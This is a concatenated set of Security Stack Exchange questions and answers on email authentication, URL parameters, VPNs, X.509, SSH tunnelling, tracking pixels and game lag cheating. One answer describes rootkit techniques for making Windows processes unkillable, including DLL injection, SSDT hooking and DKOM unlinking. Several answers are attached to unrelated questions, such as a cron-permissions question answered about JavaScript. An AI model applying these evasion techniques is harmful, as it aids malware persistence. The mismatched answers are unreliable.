occasions where MTAs will display this field (if the RFC2822 headers are corrupt). The Message (RFC2822) The message portion begins when the data command is issued. This information includes the SMTP headers you're familiar with, the message, and its attachments. Imagine all this data being copied and pasted from each MTA to the next, in succession until the message reaches the inbox. It is customary for each MTA to prefix the above mentioned copy and paste with information about the MTA (source IP, destination IP, etc). It also pastes the SPF check details. This is the Display From is placed. This is important. Spoofers are able to modify this. The Mail From: in the envelope is discarded and usually placed here as the return-path: address for NDRs So how do we prevent people from modifying the Display From ? Well DMARC redefines a second meaning for the SPF record. It recognizes that there is a difference between the Envelope From and the Display From , and that there are legitimate reasons for them to not match. Since SPF was originally defined to only care about Envelope From, if the Display From is different, DMARC will require a second DNS check to see if the message is allowed from that IP address. To allow for forwarding scenarios, DMARC also allows the Display From to be cryptographically signed by DKIM, and if any unauthorized spammer or phisher were to attempt to assume that identity, the encryption would fail. What is DKIM? DKIM is lightweight cryptographic technology that signs the data residing in the message. If you ever received a message from Gmail, Yahoo, or AOL then your messages were DKIM signed. Point being is that no one will ever know youre using DKIM encryption and signing unless you look in the headers. It's transparent. DKIM can usually survive being forwarded, and transfered to different MTAs. Something that SPF can't do. Email administrators can use this to our advantage to prevent spoofing. The problem lies with the SPF only checking the RFC2821 envelope, and not the Display From . Since most people care about the Display From shown in an email message, and not the return path NDR, we need a solution to protect and secure this piece. This is where DMARC comes in. DMARC allows you to use a combination of a modified SPF check or DKIM to verify the Display From . DKIM allows you to cryptographically sign the RFC2822 Display From whenever the SPF doesn't match the Display From (which happens frequently). Your questions Why is it still possible to forge "From: " header in e-mails? Some server administrators haven't implemented the latest technologies to prevent this sort of thing from happening. One of the major things preventing adoption of these technologies is "email forwarding services" such as a mailing list software, auto-forwarders, or school alumni remailer (.forwarder). Namely: Either SPF or DKIM isn't configured. A DMARC policy isn't set up. The email client isn't displaying the verification results of the Display From and the Resent-* or Sender field. What prevents users from simply discarding the e-mails in which the source domain of the sender doesn't match the domain of SMTP server? What doesn't match: the envelope or the body? Well according to email standards the envelope shouldn't match if it's going through a remailer. In that case we need to DKIM sign the Display From and make sure the MUA verifies this. Finally, the MUA (email client) needs to show if the sender is DMARC verified, and if someone is trying to override that with a Sender or Resent-From header.
{ "source": [ "https://security.stackexchange.com/questions/30732", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15648/" ] }
30,754
I have 2 choices in sending data between 2 web applications. I encode the data in Base64 and append to the URL and retrieve these parameters at my destination application and decode the parameters. For eg., http:/myDomain/someCode/pages/somePage.jsf?pin=MzAwMDY3MDI2OQ Send the parameters as hidden values from application1 to application2. String res=(String)request.getAttribute("paramValue"); document.myForm.action='myDestinationURL'; document.myForm.method="POST"; document.myForm.submit(); <form name="myForm" method="post"> <input type="hidden" name="paramValue" value="<%=res%>" /> In Choice 1, one can know the parameters that am sending and my Encoding technique. In choice 2, one can view the data that am sending by doing a view source easily. Apart from above things, what possible ways exist for an intruder to know my system better? And which option is more suitable in general for a developer? Choice 1 or Choice 2?
Option 1 may introduce a number of non-security related issues anyway: The resulting URL may be cached by the browser, or bookmarked, causing users to resubmit. The resulting URL may be shared by users, causing third parties to submit. The URL may be sent to your browser vendor , who may hit the site. But this is about security, and it introduces a few risks not present in option 2: The URL with its parameter may end up in the proxy logs of everything along the way, revealing your data. Your decode function is now an additional attack vector. (Does it handle unicode correctly? Does it have length restrictions?) You may be tempted to think of your encoded string as somehow secure, when it's just security through obscurity (and not very much obscurity), or perhaps more appropriately, security theatre . That said though; they are otherwise largely equivalent in the security they offer . They both submit plain text data in the HTTP header, and base64 isn't exactly rocket science (and you can base64 encode your POST version). Neither offers any meaningful protection for your data. If it's information you don't want the user to see; why are you sending it to the user to begin with? Consider the architecture you're using and see if there's a way to simply remove the risk entirely by not handling that information on the client side. So, to answer the question: with regards to sending data - both reveal the same information to an attacker; choose whichever option is more appropriate for the situation ( this Treehouse blog post may help with that ), but you should not rely on either method to actually protect anything.
{ "source": [ "https://security.stackexchange.com/questions/30754", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15520/" ] }
30,876
I am running an Android phone without a SIM card. I am using it for web surfing. Can the police localize my phone using the cell towers (BTS)? In other words, I know Android phones emit radiations even if there is no SIM inserted. Can the service provider use these radiations to detecte where my phone is?
A SIM identifies you with your network operator; it is necessary to be able to receive calls and to bill you for calls you make. Without a SIM, a phone is mostly useless as a phone, but it can still make emergency calls (in most countries). Without a SIM, your cell phone will not normally transmit data to local base stations, but if you make an emergency call, it will identify itself with the cell tower by sending its IMEI. So there is some information identifying your phone that can travel on the cell phone network, but only at your own behest. I don't know how easily the police can access this information. If you've turned off GSM altogether and are only connected through wifi, it's a different matter. The wifi access point knows your phone's MAC address. Whether (or how easily) the police has access to that depends on who owns the access point. Beyond that, your internet traffic does not inherently contain information that identifies your phone, but there is a lot of indirect information. Your IP address will pinpoint at least the access point's ISP and your general location, and with the cooperation of the access point owner your access can be tracked back to the access point by someone who is trying to trace your traffic. The content of your traffic may or may not identify you or your phone, for example through browser fingerprinting, or simply because you logged in to some online account. If someone is in the vicinity of the access point, they can physically locate your phone by measuring its radio signal.
{ "source": [ "https://security.stackexchange.com/questions/30876", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20750/" ] }
30,928
In a web-app should one strive to hide as much of the code as possible, for example from view source? In particular I was wondering should JavaScript be hidden, especially ones used for Ajax? I was thinking that if the JavaScript was an external file the file could not be on the web server or restricted using .htaccess EDIT: I realize I can't completely prevent the user from seeing JavaScript as it's interpreted on their end. However I was wondering is there a point in detering them from viewing such code, for example making it slightly harder than simply type in www.mywebsite.com/how_login_is_done.js
Javascript code executes on the client browser, so the client browser sees the code, and every user can obtain it. At best you can obfuscate the code so as to (try to) hide its meaning and behaviour. Obfuscation will not deter motivated attackers (it will just makes them a bit angrier), so it would be quite unwise to use it as foundation for your security model. If you want to hide code, don't send it to the attacker's machine; keep it on the server side.
{ "source": [ "https://security.stackexchange.com/questions/30928", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10714/" ] }
30,934
I wonder what read / write permissions should I set on my cron files (php files) so they can be executed only by our server. We're using CentOS 5.9 - 64bit and cPanel / WHM + Apache. Thanks!
Javascript code executes on the client browser, so the client browser sees the code, and every user can obtain it. At best you can obfuscate the code so as to (try to) hide its meaning and behaviour. Obfuscation will not deter motivated attackers (it will just makes them a bit angrier), so it would be quite unwise to use it as foundation for your security model. If you want to hide code, don't send it to the attacker's machine; keep it on the server side.
{ "source": [ "https://security.stackexchange.com/questions/30934", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6956/" ] }
30,947
My PSP is acting like it could possibly be infected. It is locking up and then turns off during game play. There are also problems during games that could be related. This is a replacement PSP machine because I thought my old one was defective but now this one is doing the same thing. Someone in customer service claimed it couldn't be infected but now I have my doubts. I am using the same memory stick and some of the same data that was stored on the old console. I've never visited any suspicious web sites or installed any software that wasn't either pre-installed or from the Playstation store. I also downloaded the Music Unlimited service from the Sony website. I have only updated the firmware using the update function on the console. I've suspected for years that my computer may be infected by something undetected and I used the same WI-FI network with both consoles. I had also connected the original PSP Go to the computer with a USB cable to transfer digital copies of movies.
Javascript code executes on the client browser, so the client browser sees the code, and every user can obtain it. At best you can obfuscate the code so as to (try to) hide its meaning and behaviour. Obfuscation will not deter motivated attackers (it will just makes them a bit angrier), so it would be quite unwise to use it as foundation for your security model. If you want to hide code, don't send it to the attacker's machine; keep it on the server side.
{ "source": [ "https://security.stackexchange.com/questions/30947", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20792/" ] }
30,961
Recently a free service came out for email tracking, bananatag . It's able to track the fact that the email was read in gmail without any notice or strange inclusions in the email body. In this case I have two questions: How can I block the bananatag? How does actually this service work?
It's all in the knowledgebase: https://web.archive.org/web/20140926051535/http://blog.bananatag.com/knowledgebase/how-opens-work/ We use the same technology as mass-email-marketing companies to track our Opens. This is achieved by inserting a small image in the message or Tracking Pixel into the message. When the image is downloaded you get an Open. As a recipient of such a message who does not wish to be tracked you must either block image fetching from the bananatag servers (assuming they are easily identifiable), block images which look like tracking URLs or are smaller than a certain size, or simply block images altogether.
{ "source": [ "https://security.stackexchange.com/questions/30961", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6427/" ] }
30,976
I know that http requests can be sniffed, so sniffer can see the requested URL from the victim. So 2 days ago I my bank made me a web-account to see, send money etc... The thing I saw is my session id is always on my URL.. I copy/pasted it on another browser and I successfully logged in from it without entering username/password(on the new browser). So my question is whether https:// (get) links sniffable over the wire (e.g., with ettercap)? Should I be worried?
HTTPS uses TLS, which is Transport Layer Security. HTTP as a protocol, runs above the transport layer. This means that all of the communication made by HTTPS, including the URL is protected. Passing the session id in the URL is insecure for other reasons. For example it exposes the possibility of Session Fixation . The Session ID written to paper if a user prints a webpage. It also defeats the use of HTTPOnly cookies... This is just a bad idea and its likely that this bank has made other poor choices in regards to security.
{ "source": [ "https://security.stackexchange.com/questions/30976", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20819/" ] }
30,985
I am a student, and am genuinely curious about unterminable processes in Windows. For educational purposes, I would like to create an application (possibly in VB6?) which cannot be terminable by a user from task manager or taskkill. What are some strategies and exploits that such applications employ to make this possible?
Contrary to what a lot of people believe, there are actually several ways to do this. Some of them are common, some rarely seen. Some of them are weak, some strong. It all depends on how you do it. Let's go through a collection of them: 1. Pre-NT RegisterServiceProcess trick Windows 9x, and other pre-NT operating systems, had an undocumented API in kernel32.dll called RegisterServiceProcess , which (as the name suggests) registers the process as a system service. Once a process had called this function, the operating system considered it critical and would not allow task manager to kill it. This function was removed when NT came around, so it doesn't work on XP or higher. 2. Process naming tricks Back in WinXP, the Task Manager executable contained a hard-coded list of process names that it would refuse to kill, instead displaying a message like the one you mentioned. These basically covered the critical system services such as smss.exe and rpcss.exe . The problem was that the path isn't checked, so any other executable with the same name would result in an un-killable process. This trick doesn't prevent the process from being killed, per se, but rather stops the Windows XP Task Manager from being able to kill the process. It is still possible to use another tool to kill the process. 3. Keep-alive processes These are by far the most common. Two processes are created, and repeatedly check for the other's existence. If one is killed, the other resurrects it. This doesn't stop you from killing the process really, but it does make it annoying to stop the process from coming back. Task Manager includes an option to kill the process tree, which allows you to kill a process and all child processes, which may help fix this issue. When a process is created in Windows, the OS keeps track of the process ID that created it. Kill process tree iterates through all processes and looks for those who have a parent ID equal to the process ID that you're killing. Since keep-alive processes usually work on a repeated polling, you can kill both processes before they notice anything went wrong. A defence against this is to create a dummy process that spawns the keep-alive process, then have that dummy process exit. The main process passes its ID to the dummy process, and the dummy process passes its ID to the keep-alive process, but the chain is broken when the dummy process exits. This leaves both the primary and keep-alive processes running, but makes it impossible to use Task Manager's kill process tree function. Instead, you'd have to write a script to kill them off, or use a tool that allows you to kill multiple processes simultaneously. 4. User-mode hooks via loaded DLLs It is possible to inject a DLL into a running process. In fact, Windows offers a feature to have any DLL loaded into all processes that import user32.dll, for the purposes of extensibility. This method is called AppInit DLLs. Once a DLL is injected, it may manipulate the memory of the process. It is then possible to overwrite the values of certain function pointers such that the call is redirected to a stub routine, which then calls the target function. That stub routine may be used to filter or manipulate the parameters and return values of a function call. This technique is called hooking , and it can be very powerful. In this case, it would be possible to inject a DLL into running processes that hooks OpenProcess and TerminateProcess to ensure that no application can gain a handle to your process, or terminate it. This somewhat results in an arms-race, since alternative user-mode APIs can be used to terminate processes, and it's difficult to hook and block them all, especially when we consider undocumented APIs. 5. User-mode hooks via injected threads This trick works the same as with DLLs, except no DLL file is needed. A handle to the target process is created, some memory is allocated within it via VirtualAllocEx , code and data is copied into the memory block via WriteProcessMemory , and a thread is created in the process via CreateRemoteThread . This results in some foreign code being executed within a target process, which may then instigate various hooks to prevent a process being killed. 6. Kernel-mode call hooks In the kernel, there's a special structure called the System Service Dispatch Table (SSDT), which maps function IDs from user-mode calls into function pointers in to kernel APIs. This table is used to transition between user-mode and kernel-mode. If a malicious driver can be loaded, it may modify the SSDT to cause its own function to be executed, instead of the proper API. This is a kernel-mode hook, which constitutes a rootkit. Essentially it is possible to pull the wool over the OS's eyes by returning bogus data from calls. In fact, it is possible to make the process not only un-killable, but also invisible. One issue with this on x64 builds is that the SSDT is protected by Kernel Patch Protection (KPP). It is possible to disable KPP, but this has far-reaching consequences that may make it difficult to develop a rootkit. 7. Direct kernel object manipulation (DKOM) This trick also involves loading a malicious driver on the OS, but doesn't require alteration of the SSDT. Processes on the system are stored as EPROCESS structures in the kernel. Keep in mind that this structure is entirely version-dependant and is only partially documented by Microsoft, so reverse engineering is required across multiple target versions in order to make sure that the code doesn't attempt to read the wrong pointers or data. However, if you can successfully locate and enumerate through EPROCESS structures in the kernel, it is possible to manipulate them. Each entry in the process list has an FLink and BLink pointer, which point to the next and previous processes in the list. If you identify your target process and make its FLink and BLink pointers point back to themselves, and the FLink and BLink of its siblings point to each other, the OS simply skips over your process when doing any housekeeping operations, e.g. killing processes. This trick is called unlinking. Not only does this render the process invisible to the user, but it also prevents all user-mode APIs from targeting the process unless a handle to the process was generated before it was unlinked. This is a very powerful rootkit technique, especially because it's difficult to recover from. 8. Debugger tricks This is a pretty cool trick that I've yet to see in the wild, but it works quite well. The Windows debugger API allows any process to debug another, as long as it has the permissions to do so. If you use the debugger API, it is possible to place a process in a "debugged" state. If this process contains a thread that is currently halted by a debugger, the process cannot be killed by Windows, because proper thread control cannot be guaranteed during termination when the thread is blocked. Of course, if you kill the debugger, the process stops being debugged and either closes or crashes. However, it is sometimes possible to produce a situation where a chain of processes exist that debug each other in a loop. If each process halts a dummy thread in the next, none can be killed. Note that it is possible for a power user to manually kill other threads within the process, rendering it useless, but it still won't be killed. 9. Windows 8 DRM This is a new one I've only heard of recently, but I don't know much about it. There was a bit of a rumour going around on Twitter about it, and I've seen snippets here and there on various technical sites, but I've yet to see any concrete research. I think it's still early days. Essentially, the story is that Windows 8 has a mechanism that allows "trusted providers" to register processes as DRM critical, preventing them from being killed or manipulated by the user. Some people have speculated that the mechanism for checking trusted providers is weak, and may be open to attack.< - Looks like this one was bogus. So much for the rumor mill! Update: Harry Johnston pointed out in the comments that Windows 8.1 introduces protected services , which are designed to be used by AV and DRM to protect against being manipulated or attacked by lower-privileged code on the system. 10. Tool manipulation This one has probably been used a lot in the wild, but I've never seen it done properly. Essentially this trick involves targeting specific tools, e.g. Task Manager, by editing the executables on disk in a way that alters functionality. This is very similar to the user-mode hook tricks I mentioned earlier, but in this case they persist on disk and have wider-reaching consequences than simple API hooking. Of course, one issue is that Windows File Protection (WFP) prevents alteration of certain critical system files, including the task manager. Amusingly, though, it is possible to alter the default task manager executable path via the registry. So, instead of messing with the task manager executable file, just dump your own version somewhere and make the OS use it. All in all, there are plenty of ways to achieve this, with varying degrees of robustness. The above represents a majority of them, but isn't exhaustive. In fact, many of the tricks I described can be achieved in alternate ways, using different mechanisms or APIs to achieve the same goal.
{ "source": [ "https://security.stackexchange.com/questions/30985", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
31,030
What exactly happens if I connect through two VPN clients on my laptop? For example, I connect using Cisco Any Connect, and then use another VPN client (such as HotSpot Shield or proXPN) to connect through another tunnel. Will the actual data be decrypted at the first server/site and be in plaintext/visible? I mean, will this happen: data is encrypted at my laptop, sent to server 1, decrypted, then encrypted, sent to server 2 where it's finally decrypted. I doubt it, because the second tunnel is through my client to server 2 , not server 1 to server 2 . Or will it be a tunnel in a tunnel? So: data is encrypted and encapsulated twice at my laptop, decrypted at server 1, but is not yet in plaintext, and would be routed to server 2 where it'll be finally decrypted. Or will the laptop simply pick one tunnel (the latter?) for a normal client-to-site VPN? Or will the second connected not even establish in the first place?
A typical VPN client works like this: it connects to the server, and then it instructs the operating system to give him all packets which are to be sent to any address in a given set. For instance, let's assume that the VPN client advertises that it should handle all packets meant for 10.0.0.0/8 (i.e. all IP addresses which start with "10"). When the OS sees a packet which should go to address "u.v.w.x", it checks whether "u" is "10"; if yes, then it gives the packet to the VPN, which does its magic with it and forwards it, under heavy encryption/MAC/whatever to the server; otherwise, the packet is emitted "to the Internet" as the OS would have done without the VPN client. Details on how this system is implemented depend on the VPN implementation (e.g. it may declare specific "routes"; or it could intercept all outgoing packets with firewalling rules and redirect the packets it is interested in;...). If you have two VPN clients and their "advertised sets of addresses" do not overlap, then chances are that they will live together nicely at the IP level : each will grab the packets for its own virtual network, leaving the other packets untouched. However, they might also fight for the "interception resources" which may result in the first VPN client to be wholly deactivated. On the other hand, if both VPN advertise overlapping sets of addresses, then trouble is pretty much guaranteed. If you are lucky, the second VPN will refuse to run with an explicit message. Otherwise, one of the clients may take precedence, possibly intermittently, and things will be weird and confusing. Possibly, one VPN server will receive the packets which were due for the other VPN, thus incurring a severe data leak. There will be trouble with DNS . Applications and humans do not want to deal with IP addresses but with host names . The DNS converts host names to IP addresses. A VPN being a "virtual private network", it uses names which are not visible to the worldwide, Internet DNS. Therefore, a VPN client will not only intercept IP packets, but also the name resolution system, and redirect some (if not all) of name resolution requests to a dedicated DNS server on the VPN. Your two VPN clients will compete for that redirection. Things might just work well if the clients manage to redirect requests for just some domains. But chances are that hijinks will ensue. Some names for one VPN will probably cease to be convertible to IP addresses, resulting in reduced functionality. Possibly, one VPN will receive name resolutions for the other VPN, so not only is the functionality broken (because the DNS in one VPN will not know what to do with names from the other VPN) but some private data leaks from one VPN to another (host names are rarely very sensitive, but that's still a leakage). In this last situation, the VPN which receives name resolution requests for private names of the other VPN is in ideal position to respond with forged DNS answers and redirect all traffic from the other VPN to itself. So don't do that . Running several VPN clients concurrently is a source of trouble, hard-to-diagnose failures and potential data leaks. To avoid issues with multiple VPN , you should endeavour to use more "controlled" forms of VPN. For instance, a SOCKS proxy with ssh . This would allow you to run one Web browser which redirect all its traffic to another host (the "VPN server") while leaving the rest of the machine (and, crucially, other browser instances) unaltered. See this answer for instance. Some purists say that such proxying is not a VPN, but for many practical purposes (anything which is Web-based, really), this is functionally equivalent. See also the alternative with port-based tunnels. I used to do that a lot at one time (a dozen or so port-based tunnels, and also SOCKS proxying, and it was all working well). The SOCKS solution works well for name resolution too: the name resolutions requests from the Web browser will go through the tunnel, to be resolved on the other side (i.e. in the VPN), without touching the local DNS configuration. Port-based tunnels require a static local name declaration.
{ "source": [ "https://security.stackexchange.com/questions/31030", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20871/" ] }
31,049
Recently, a website related to our university was hacked along with many others . This led to a general discussion 1 on how to secure the website in the future. Anyway, there is one point that was discussed quite a bit. Assuming that one is a competent developer, is it better to "code from scratch" (write your own homebrew framework to host the site), or is it better to use a popular framework that is freely available? I understand that this may not have a simple "yes/no" answer. I'm looking for some explanation as to when each option is favorable. Or a detailed comparison of the two options would be nice as well. 1 If anyone wants, this is the mailing list thread , but it talks about other things as well and you probably don't want to look at it ;-)
You certainly want your code to be written by the most skilled developer possible, but that's not enough. Even the most competent developers make mistakes (though less competent ones obviously tend to make more mistakes). To get relatively mistake-free code and algorithms, you want to start out with the cleanest code possible, but that's only half the process. The best way to eliminate faults is to have as many skilled developers as possible comb through the code looking for them. This holds true for code as much as it does for algorithms. Your solution needs to be widely vetted by the most experienced people possible. Where you start -- the skill level of the original developer -- is just the starting point. After sufficient review, it doesn't really matter how skilled the original developer was. So here's the key: the security value in any code is in how well-vetted it is . Whether it was written by you, by a renowned cryptographer, a large corporation, or nobody in particular, all that matters is how many skilled eyes have scrutinized the code. Such a rule tends to favor established frameworks over homespun solutions. But established is not necessarily the same as vetted , which is part of why many security experts tend to favor open-source solutions: it's difficult for an open-source project to become popular without it being subjected to a certain amount of scrutany.
{ "source": [ "https://security.stackexchange.com/questions/31049", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7497/" ] }
31,139
I have small doubt regarding the process of X509. I am aware of OpenPGP Encryption/Decryption, where we generate the public key and private key. We can share the public key to vendors and they can encrypt data with the key and we can decrypt the data using out private key. It's simple and straight-forward for me. When it comes to X509, I am bit confused. My client wants to use X509 certificate to transfer sensitive information [which's already encrypted using symmetric Encryption like AES] between two people [between client and his vendors]. How X509 works if we can generate the certificate using only public key. Assume, if I encrypt the data using AES with one random generated key. How do I transfer this data along with key to vendor using X509 so that any third party will not intercept during network transmission. Could any one please explain? Btw, we transfer the data in SOAP message including Certificate info
X.509 is a format for certificates : a certificate is a sequence of bytes which contains, in a specific format, a name and a public key , over which a digital signature is computed and embedded in the certificate. The signer is a Certification Authority which asserts that the public key is indeed owned by the entity known under that name. By verifying the signature, you can make sure that the certificate is genuine, i.e. is really what the CA issued; and, that way, you gain trust in the binding of name with public key (insofar as you trust the CA for being honest and not too gullible, and as you know the CA key for signature verification, which may entail obtaining a certificate for the CA, and verifying that certificate, and so on, up to a trust anchor aka root certificate ). Thus, X.509 is a way to distribute public keys , by which I mean: a method which allows various actors (e.g. you) to know, with some guarantee of non alteration by malicious third parties (i.e. "attackers") the public keys of other actors. OpenPGP is a standard format for a lot of things. One of the things which OpenPGP defines is a way to encode a public key along with a "name" (an email address), and a signature over these two. That's, really, a certificate in its own right (although with a format which is not compatible with X.509). But OpenPGP also defines how to use the public key of a given individual (let's call him Butch) in order to encrypt a bunch of bytes that only Butch, using his private key, will be able to decrypt. Technically, this uses a randomly generated session key, used with AES (or similar) to encrypt the raw data, and that session key is what is encrypted with the recipient's public key (generally of type RSA or ElGamal). Therefore, for your problem, you do not want to "encrypt with X.509". X.509 defines nothing about encryption. What you want is to use a standard format which describes encryption with the recipient's public key and builds on X.509 certificates for the public key distribution. This standard format, coupled with X.509, would be an analogous to OpenPGP. This standard format exists and is called CMS (formerly known as "PKCS#7"). When CMS objects are sent by email, this becomes another layer of standard, which is called S/MIME . CMS (or S/MIME) is what you need for asynchronous communication: you prepare a blob, to be sent later on to the recipient, like what you do with OpenPGP. If you can make a synchronous communication (sender and recipient are "online" simultaneously), then you can use SSL/TLS (or its Web counterpart HTTPS ). In SSL, the server has a public key, which it sends to the client as an X.509 certificate. The client validates the certificate, then uses the public key contained therein in order to establish a session key with the server, and encrypt the data with that session key. In any case, assembly of cryptographic algorithms into protocols is known to be hard to do correctly, nigh impossible to test for security, and fraught with perils. So don't imagine that you may build your own mix; you really should rely on an existing standard, like CMS or SSL.
{ "source": [ "https://security.stackexchange.com/questions/31139", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20192/" ] }
31,148
Our security vendor detected that our client's CAS server was doing a nessus scan in the internal network. It's not uncommon for this vendor to issue a false positive, but I'm looking for general guidance on how I should analyze this Windows based server if a hack was indeed attempted. What files might be left over? What might be modified? How do I safely gather enough information to know if it should be nuked from orbit.
X.509 is a format for certificates : a certificate is a sequence of bytes which contains, in a specific format, a name and a public key , over which a digital signature is computed and embedded in the certificate. The signer is a Certification Authority which asserts that the public key is indeed owned by the entity known under that name. By verifying the signature, you can make sure that the certificate is genuine, i.e. is really what the CA issued; and, that way, you gain trust in the binding of name with public key (insofar as you trust the CA for being honest and not too gullible, and as you know the CA key for signature verification, which may entail obtaining a certificate for the CA, and verifying that certificate, and so on, up to a trust anchor aka root certificate ). Thus, X.509 is a way to distribute public keys , by which I mean: a method which allows various actors (e.g. you) to know, with some guarantee of non alteration by malicious third parties (i.e. "attackers") the public keys of other actors. OpenPGP is a standard format for a lot of things. One of the things which OpenPGP defines is a way to encode a public key along with a "name" (an email address), and a signature over these two. That's, really, a certificate in its own right (although with a format which is not compatible with X.509). But OpenPGP also defines how to use the public key of a given individual (let's call him Butch) in order to encrypt a bunch of bytes that only Butch, using his private key, will be able to decrypt. Technically, this uses a randomly generated session key, used with AES (or similar) to encrypt the raw data, and that session key is what is encrypted with the recipient's public key (generally of type RSA or ElGamal). Therefore, for your problem, you do not want to "encrypt with X.509". X.509 defines nothing about encryption. What you want is to use a standard format which describes encryption with the recipient's public key and builds on X.509 certificates for the public key distribution. This standard format, coupled with X.509, would be an analogous to OpenPGP. This standard format exists and is called CMS (formerly known as "PKCS#7"). When CMS objects are sent by email, this becomes another layer of standard, which is called S/MIME . CMS (or S/MIME) is what you need for asynchronous communication: you prepare a blob, to be sent later on to the recipient, like what you do with OpenPGP. If you can make a synchronous communication (sender and recipient are "online" simultaneously), then you can use SSL/TLS (or its Web counterpart HTTPS ). In SSL, the server has a public key, which it sends to the client as an X.509 certificate. The client validates the certificate, then uses the public key contained therein in order to establish a session key with the server, and encrypt the data with that session key. In any case, assembly of cryptographic algorithms into protocols is known to be hard to do correctly, nigh impossible to test for security, and fraught with perils. So don't imagine that you may build your own mix; you really should rely on an existing standard, like CMS or SSL.
{ "source": [ "https://security.stackexchange.com/questions/31148", "https://security.stackexchange.com", "https://security.stackexchange.com/users/396/" ] }
31,226
Are there client programs that allow me to "tunnel" through my SSH enabled server for normal Internet requests such as HTTP(s)? If so what are they and can someone point me in the right direction? Note: I'm not asking about a VPN; I'm specifically asking if its possible to "tunnel" a connection through SSH.
Most SSH clients will do that for you. With the ssh client provided with any good Linux system, simply type: ssh -D 5000 -N theservername where theservername is the name of the SSH server to which you want to tunnel the requests. Then set your Web browser to use localhost , on port 5000, as SOCKS proxy. And voila! all your HTTP and HTTPS requests will go through the SSH tunnel and exit on the other side. For Windows, PuTTY can also be used as a SOCKS proxy .
{ "source": [ "https://security.stackexchange.com/questions/31226", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
31,229
On a banking website I see that they have disabled right-click. Does that make the site any more secure? Is it a good general practice?
Does it make the site any more secure? No, it doesn't alter anything other than your ability to conveniently save items from a page. Using a browser's developer mode, turning off JS, overriding this with a different script that disables that pop-up, or just grabbing data off the wire after stripping the SSL will all work. Is it a good general practice? This is an ache that the Internet has had to suffer from the height of GeoCities fame when folks didn't want you to "steal" their very poorly composed photos of dandelions and family pets. Dispensing all professionalism and being straight-forward as possible, I might hesitate to convict a person for smacking the responsible party of any modern site using this upside the head with a cast iron skillet. Aside from that it has generally fallen out of favor due to being a combination of ineffective and annoying. For instance, it would also make my spellchecker misbehave.
{ "source": [ "https://security.stackexchange.com/questions/31229", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3185/" ] }
31,303
There is an attack that some people have dubbed "lag hacking", and its gaining popularity in multiplayer games. There are at-least two ways of creating artificial latency . One method of introducing artificial latency is using a lag switch , where the user intentionally disconnects their network cable. Another method is using a flood of syn or udp packets to cause controlled and predictable disruption in the game so that a player can gain an unfair advantage. Artificial latency attacks affect a large number of multiplayer games . Some game companies have been made aware of this attack by their users, but are ignoring this vulnerability because they don't have a solution . The tools to carry out this attack are simple to construct, readily available and easy to use . They will often spoof the source IP address to make the attack difficult to trace. So security.se, lets come up with a solution to this problem. But first lets talk a bit about game protocols. Online games commonly use UDP due to decreased latency and overhead, but this also increases the susceptibility to spoofing. Game protocols can use Latency Hiding to decrease the "perceived latency", but this may increase the impact of artificial lag. Multiplayer games often use a p2p architecture, for example Hydra: Peer-to-Peer architecture for games , and a peer is easy to flood. The Unreal network architecture is well documented, and is also vulnerable to this attack . (If there is another resource I should list, let me know!)
I see two conceptual paths for dealing with lag attacks: Punish lags . When an "artificial" lag is detected, evict the offender and enforce a ban period. This is hard to do in practice because there is a delicate balance to be found between people who cheat through lagging, and people who simply suffer from an occasional hiccup in their Internet connection. It is bad business practice to smite your own customers. Such kinds of solutions will necessarily end up with a threshold to distinguish between bad people and unlucky people. Cheaters will stick close to the threshold and this will probably be sufficient to gain some strategic advantage. One promising approach along the punishment line is to apply small but cumulative penalties for each lag: whenever a packet is lost or shows up late, remove one hit point, make the player flash, whatever... this can even be integrated in the game universe (for instance, for a FPS convert the detected lag into a rifle jam). This implies that people with reliable Internet connections and big computers will be at an advantage -- and I believe that players are ready to accept that, on the basis that similar things happen in a lot of other leisure-competition situations (e.g. if your hobby is skateboarding, you know that a better skateboard will not replace talent, but will help nonetheless, and skateboarder accept that as a fact of life). Ultimately, this might incite ISP to work a bit on their latency, which would be good for everybody , not just gamers. Don't trust clients . Massively online games are distributed computing . Most of their security issues are due to the fact that many game rules, i.e. the properties of the world in which the players act, are maintained by the client systems. The players themselves, and in particular the potential cheaters, have extensive control of their machines. Existing countermeasures tend to have limited effectiveness for the same reasons that software DRM and antivirus may fail: this is an arms race in which attackers and defenders are locked into a fast-paced battle of patches and counterpatches which is tiresome and requires expensive, continued maintenance. The generic architectural response is to maintain the game rules server-side only; clients become "thin" and are just display interfaces. This is unfortunately hard to implement, because display performance (hence game experience) becomes very sensitive to latency, artificial and natural alike; and ADSL links will have a minimal latency close to 50 ms, which is high with regards to average gamer reflexes. Also, this means that the game servers need more CPU muscle. But the security advantage is huge: when a player induces lagging, he inherently punishes himself and none other. Maintaining all game state and rules on the servers is not completely science-fiction either. Back in the late 1980s, one of the very first MMO games was "CarCrash", an offspring of the defunct French magazine Jeux et Stratégie ; it was played over the Minitel , another old French technology where users simply had text terminals (with limited graphics) with no local computing abilities; the central server(s) maintained the game rules and computed the screen updates for everybody, and it worked. Computers at that time had far less CPU muscle than today; a 20 MHz CPU was enough to be deemed a "supercomputer". A 35$ home router of 2013 is more than ten times as powerful as a big server of that era. And yet it worked. Maintaining game rules on the server implies departing from the way games are usually architectured. Historically, most games were local and became multiplayer by connecting clients with each other, with possibly a central server which only served as rendez-vous point. To take a political metaphor, games became multiplayer by forming confederations , but security against cheaters requires a federation . Mixed strategies are possible, of course. The core idea is the same: give as few sensitive data as possible to client systems; and when you must trust them for something, use a big stick or a big carrot to maintain them in line . (If you understand that players should be handled like cattle herds, well,... there is truth in that, indeed. You don't want your cows to be unhappy, but you will not let them choose their walking direction and pace either.) Edit: just got an insight while waiting for my tea to cool a bit. A game architecture could include several (possibly dozens) of cooperating "trusted" servers spread worldwide, which "play the game" like game clients do today. Each gamer would connect to one server which is "close by" (in a network sense) so as to have a low latency, allowing for the display-only strategy outlined above. If ISP themselves can be involved in the deal (each ISP would host a few servers in its own 